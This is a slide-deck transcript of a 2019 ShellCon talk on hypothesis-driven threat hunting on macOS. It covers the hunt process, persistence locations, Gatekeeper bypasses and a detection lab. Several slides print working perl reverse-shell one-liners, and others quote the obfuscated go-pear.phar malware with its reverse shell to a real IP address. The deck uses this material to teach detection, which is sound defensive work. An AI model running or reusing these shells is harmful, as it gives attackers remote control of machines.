Hypothesis driven MacOs Threat Hunting

Transcript

1. Hypothesis driven MacOS Threat Hunting ShellCon 2019

2. 2 About us

3. 3 osquery> select * from logged_in_users ; osquery> select *

   from logged_in_users ; +------+---------+----------+--------+-------------+-------+ | type | user | tty | Role | Passtime | pid | +------+---------+----------+--------+-------------+-------+ | user | Art | console| DFIR | <secret> | 88 | | user | Plug | ttys01 | DFIR | Synths | 133 | +------+---------+----------+--------+-------------+-------+ osquery>

4. 4 Paranoids

5. 5 Agenda: • Background for the talk • The Hypothesis

   and hunt process • Things to Hunt in macOS • Putting into action: Let’s go Hunt • Final Notes • Questions

6. Most common questions: • • • What should I hunt?

   • How do I get started? • 6

7. What is Hunting... • • It is "the process of

   proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions." -Wikipedia 7

8. What is Hunting... • • “Simply put, hunting is the

   act of finding ways for evil to do evil things” -Danny Akacki 8

9. What is Hunting... • • “A methodology to proactively look

   for unknown unknowns” -Plug 9

10. Hunt Use Cases [What should I hunt] • Previous Incident

    • Threat Intel Data • Adversary Emulation • Research • Red Team • Crown Jewels • Defense Posture Assumptions 10

11. A note about data... • • Data and it’s quality,

    is key. • 11

12. Data... • For your review • 12 https://github.com/hunters-forge/ThreatHunter-Playbook/tree/ master/pre-hunt •

    Roberto Rodriguez @Cyb3rWard0g • Jose Luis Rodriguez @Cyb3rPandaH

13. Threat Hunting is not difficult • • The hunt process

    is simple. • 13

14. The Hypothesis • • 14

15. The Hypothesis 15

16. 16

17. The Hypothesis • • “A supposition or proposed explanation made

    on the basis of limited evidence as a starting point for further investigation.” 17

18. 18 The Hypothesis and the 6 Ws

19. 19 • PURPOSE • REASON BEHIND THE HUNT • DATE

    • TIME • DURATION • THE LOCATION OF ARTIFACTS WE WANT TO HUNT IN THE DATA • THE ITEM WE WANT TO HUNT • USERNAME/ACCOUNT • HOSTNAME • IP/PORT The Hypothesis and the 6 Ws

20. 20 • THE WAY WE ARE GOING TO CONDUCT THE

    HUNT The Hypothesis and the 6 Ws

21. 21 The Hypothesis Creating a hypothesis

22. 22 The Hypothesis • • “A supposition or proposed explanation

    made on the basis of limited evidence as a starting point for further investigation.”

23. 23 The Hypothesis

24. 24 The Hypothesis

25. 25 The Hypothesis

26. 26 Details matter! From this To this

27. Hunting Templates • • ThreatHuntingProject • ThreatHunting Template 27 https://github.com/ThreatHuntingProject/ThreatHunting/blob/master/TECH

    NIQUE%20TEMPLATE.md

28. Hunting Templates • • ThreatHunter-Playbook • Hunting Template 28 https://github.com/hunters-forge/ThreatHunter-Playbook

29. Hunt Process 29

30. 30 Hunt Process - Step 1 Do I have a

    hypothesis? • Who • What • When • Where • Why • How Yes No Idea No Create one!

31. 31 Hunt Process - Step 2 Do I have the

    data to test the hypothesis? • Do I have any logs? • Are logs being forwarded? • Do I have the right index? • Do I have the proper events? Yes No Idea No Get Data! Go Hunt!

32. 32 Hunt Process - Step 3 Do I need a

    test case? // Example gscript template // Title: Launch Agent Persistence // Author: ahhh // Purpose: Drop a sample binary and a launch agent plist and persist it using Launch Agent // Gscript version: 1.0.0 // ATT&CK: https://attack.mitre.org/wiki/Technique/T1159 Yes No Idea No Go Hunt ! Create one!

33. 33 Hunt Process - Step 4 Do I know what

    to look for? • Launch Daemons/Agents • Kernel extensions • Cron Jobs • Gatekeeper and XProtect Bypasses • Abnormal Shell Activity • Browser extensions Yes No Idea No Research!

34. 34 Hunt Process Flow

35. Hunt Process Flow 35 Do you have a Hypothesis? Start

36. Hunt Process Flow 36 Do you have data?

37. Hunt Process Flow 37 Do you need a test case

    or emulation?

38. Hunt Process Flow 38 Ready for the Hunt!

39. Hunt Process Flow 39 Any issues found?

40. Hunt Process Flow 40 Any issues found?

41. Hunt Process Flow 41 Any issues found?

42. Hunt Process Flow 42 Any issues found?

43. Hunt Process Flow 43 Any issues found?

44. Hunt Process Flow 44 Any issues found?

45. Hunt Process Flow 45 Improve your Defenses Wins: • Less

    Visibility Gaps • Better Data • Better Detections • Metrics that quantify why the hunt program is valuable!

46. Hunt Process Flow 46 But, how about anomalies?

47. Hunt Process Flow 47 Any issues found?

48. Hunt Process Flow 48 Any issues found? Anything that requires

    immediate attention should get prioritized and escalated.

49. Hunt Process Flow 49 VS Start Start

50. Hunt Process Flow 50 Start

51. Hunt Process Flow 51 VS Start Start

52. Hunt Process Recap 52 • Hypothesis • Data • Test

    Case • Hunt • Review Findings • Escalate [If needed] • Document Findings • Remediate Gaps • Improved Detections • Repeat

53. In short 53 • How do I get started? Create

    a Hypothesis and follow a process What should I hunt? Totally up-to you, use hunt cases as basis

54. 54 Laying the foundation: Step1 Step 2 Step 3 Step

    4 Step 5 Things to Hunt: macOS

55. macOS Malware • Mami • CrossRAT • CreativeUpdate • Shlayer

    • Dummy • Calisto • AppleJeus • WindTail • ETC….. 55 https://objective-see.com/blog/blog _0x3C.html

56. Places with great indicators • Launch Daemons • Launch Agents

    • Kernel extensions • Cron Jobs • Browser extensions • Abnormal Shell Activity • Gatekeeper and XProtect Bypasses • Exfiltration 56

57. Launch (Daemon|Agent)s • .plist (configuration) files ◦ Start, Stop and

    Manage scripts and processes • Launch Daemons ◦ Run without a logged in user. ◦ No GUI interaction. ◦ stored: /System/Library/LaunchDaemons/ & /Library/LaunchDaemons/ 57

58. Launch (Daemon|Agent)s • Launch Agents ◦ Associated user must be

    logged in. ◦ GUI interaction. ◦ stored: /System/Library/LaunchAgents : /Library/LaunchAgents. : ~/Library/LaunchAgents folder. • Equivalent to runkeys and services on Windows 58

59. Launch (Daemon|Agent)s 59

60. Kernel extensions (In Catalina: system extensions) 60 • OS X

    provides a kernel extension mechanism as a means of allowing dynamic loading of code into the kernel, without the need to recompile or relink. Because KEXTs provide both modularity and dynamic loadability, they are a natural choice for any relatively self-contained service that requires access to internal kernel interfaces -- [BADNESS!] -- https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/KernelProgramming/Extend/Extend.html • KMs are typically loaded into /lib/modules as extension .ko • Adversaries will check KMs before loading maliciousness to ensure compilation • Monitor for execution of kextload commands ◦ Correlate with known goods. https://attack.mitre.org/techniques/T1215/

61. Kernel extensions (In Catalina: system extensions) 61 Differences: • KEXTs

    execute their code at the macOS kernel level, • System extensions leverage controlled user-space. https://attack.mitre.org/techniques/T1215/ Hypothesis Idea: Do we have non standard kext loads in our environment? Are security tools being kext unloaded?

62. Kernel extensions (In Catalina: system extensions) 62

63. Cron Jobs • /etc/crontab file, /etc/cron.d/ • at • launchd

    ◦ Each launchd job is described by a different (plist) file ◦ Additional Key called: StartCalendarInterval • What is normal in your environment? ◦ Rack and stack -- find the outliers! 63

64. Cron Jobs 64

65. Browser extensions • Inventory and monitor browser extension installations that

    deviate from normal, expected, and benign extensions. ◦ Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates. • Monitor for any new items written to the Registry or PE files written to disk. ◦ May correlate with browser extension installation. 65 https://attack.mitre.org/techniques/T1176/

66. Browser extensions 66

67. Abnormal Shell Activity • Odd SSH Commands (ssh -R with

    follow-on external connect?) • Local port forwards • Why are you touching /etc/pam.d/sudo? ◦ SPOILER: TOUCH TO SUDO! (or badness) • Stomping history files • What is that running from /tmp/? • etc 67

68. Gatekeeper and XProtect Bypasses 68 • When files are downloaded

    from the internet the com.apple.quarantine attribute flag is set. ◦ At program execution this flag will prompt the user to allow or deny execution as the system acknowledges that the file was downloaded from the internet. • Files from external media or network shares do not set this flag! ◦ The Gatekeeper check is now bypassed ◦ hunt for this attribute being removed with ▪ xattr -r -d com.apple.quarantine /path/to/MyApp.app https://attack.mitre.org/techniques/T1144/ courtesy of osxdaily.com

69. Gatekeeper and XProtect Bypasses 69

70. Exfiltration • Mass Directory Compression • Keyword Searching ◦ Pass,pw,password,key,token

    ◦ $mySuperSecretSpecialSauce • Cloud Storage Solutions ◦ Does your AUP allow: ▪ DropBox ▪ iCloud ▪ etc. • Pastebin (etc etc etc) ◦ Monitor uploads • Corporate Mobile Use ◦ Blind (etc etc etc) 70

71. 71 Putting into action: Step1 Step 2 Step 3 Step

    4 Step 5 Let’s go Hunt The Lab Setup

72. Huntlab Osquery 72 Kolide Fleet Fortinet FortiAppMonitor FireEye Monitor.App ELK

    Stack Moloch

73. Huntlab - Host and Network Visibility 73 + = Host

    Level Network Level Hunters Dream!

74. Huntlab Gscript -@alexlevinson and CCDCRedTeam 74 EvilOsx -Marten4n6 Some malware

    :) Old Fashion Console Apfell - @its_a_feature_ Huge props and thanks to: @1njecti0n

75. Huntlab - Setup 75

76. 76 Putting into action: Step1 Step 2 Step 3 Step

    4 Step 5 Let’s go Hunt

77. Hypothesis 77

78. macOS Prompt for Password 78 Event Activity Secrets Collected Hypothesis:

    What OSAScripts do we have visibility into? Any outliers?

79. macOS Prompt for Password Kibana example of the gs script

    being created and executed! 79 Beware of Legit App Activity

80. Hypothesis 80

81. Odd shell activity - base64 blob 81 /bin/sh -c echo

    IyAtK10gY29kaW5nO…

82. Odd shell activity - base64 blob 82 Base64 decode

83. Hypothesis 83

84. History Stomping! 84

85. History Stomping! 85

86. Hypothesis 86

87. OSX Dumy Callback attempts: 87

88. OSX Dumy Callback attempts: 88

89. OSX Dumy Callback attempts: 89

90. OSX Dumy Callback attempts: 90

91. 91 Pause Recall this….

92. Huntlab - Host and Network Visibility 92 + = Host

    Level Network Level Hunters Dream!

93. Unleash the Owl! - https://molo.ch ~ https://github.com/aol/moloch Moloch is a

    Large scale, open source, indexed packet capture and search tool (FPC). 93 Shout-outs to: Andy Wick & Elyse Rinne & the entire moloch community! Thank you for your continuous contributions to Moloch!

94. OSX Dumy Callback attempts: 94 ip.dst == 185.243.115.230

95. OSX Dumy Callback attempts: 95

96. Go-Pear.phar 96 Rotten Pears

97. Hypothesis 97

98. Hunting perl tty/reverse shells 98 • perl -e 'use Socket;$i=""10.0.0.1"";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(""tcp""));if(c

    onnect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"">&S"");open(STDOUT,"">&S"");open(ST DERR,"">&S"");exec(""/bin/sh -i"");};' • perl -e 'exec "/bin/sh";' • perl: exec "/bin/sh"; • perl -MIO::Socket -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr => "x.x.x.x:xx");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''

99. Hunting perl reverse shells 99 • perl -e 'use Socket;$i=""10.0.0.1"";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(""tcp""));if(c

    onnect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"">&S"");open(STDOUT,"">&S"");open(ST DERR,"">&S"");exec(""/bin/sh -i"");};' • perl -e 'exec "/bin/sh";' • perl: exec "/bin/sh"; • perl -MIO::Socket -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr => "x.x.x.x:xx");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''

100. Hunting perl reverse shells 100 • perl -e 'use Socket;$i=""10.0.0.1"";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(""tcp""));if(

     connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"">&S"");open(STDOUT,"">&S"");open(ST DERR,"">&S"");exec(""/bin/sh -i"");};' • perl -e 'exec "/bin/sh";' • perl: exec "/bin/sh"; • perl -MIO::Socket -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr => "x.x.x.x:xx");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''

101. Go-Pear.phar aka Rotten Pears 101

102. Rotten Pears - Obfuscated Code 102 code snip: 1270:${"\x47\x4cO\x42\x41\x4cS"}["ki\x72\x69\ x68\x71\x68"]="st\x72";${${"GLOBA\x4c\x53"}..

     ."

103. Rotten Pears - Shell Code 103 {"GLOBALS"}["kirihqh"]="str";${${"GLOBALS"}["kir ihqh"]}="use Socket; print

     "started"; $host = "104.131.154.154"; $port = 443; $proto = getprotobyname("tcp") || socket(SERVER, PF_INET, SOCK_STREAM, $proto)

104. Rotten Pears - Reverse Shell 104 sh -c perl -e

     'use Socket; print "started"; $host = "104.131.154.154"; $port = 443; $proto = getprotobyname("tcp") || exit(); …...snip….print("exec"); exec {"/bin/sh"} "-bash" . "\0" x 4; print("exit"); exit(0); }' > /dev/null 2>/dev/null

105. Rotten Pears 105

106. Go-Pear.phar aka Rotten Pears 106

107. Go-Pear.phar aka Rotten Pears 107

108. Go-Pear.phar aka Rotten Pears 108

109. Rotten Pears 109

110. Recap 110 • How do I get started? Create a

     hypothesis and follow a process Step1 Step 2 Step 3 Step 4 Step 5

111. Recap 111 • What should I hunt? Totally up-to you,

     use hunt cases as basis

112. 112 Almost done When Hunting, review the findings

113. 113 Almost done Adjust and Improve Detections

114. Almost done 114 Experiment what works for your Org.

115. Almost done 115 Make your Hypothesis count, narrow the scope!

116. Almost done 116 Detailed Hypothesis = better Hunts

117. Host and Network Visibility 117 + = Host Level Network

     Level Hunters Dream!

118. 118 Almost done Step1 Step 2 Step 3 Step 4

     Step 5 Happy Hunting!

119. Props: 119 @1njecti0n - Awesome Red Teamer, checkout his blog:

     https://lockboxx.blogspot.com/ The folks and community behind Osquery and Fleet Andy Wick & Elyse Rinne & the entire moloch community! Thank you for your continuous contributions to Moloch! DC562, Reverse Shell Corp (RSC)

120. Props: 120 @4ensic8 - Art Maddalena (awesome coworker) who could

     not be here presenting with me. You rock dude! The folks and community behind Derpcon The amazing community at the Threat Hunters Forge Slack Channel https://launchpass.com/threathunting Join the APT29 Evals Detection Hackathon! (May 2nd) https://mordordatasets.com/hackathons/apt29.html The Awesome Paranoids Team You, thanks for watching! The Paranoids FIRE Team #IRLife

121. 121 End Step1 Step 2 Step 3 Step 4 Step

     5 Questions?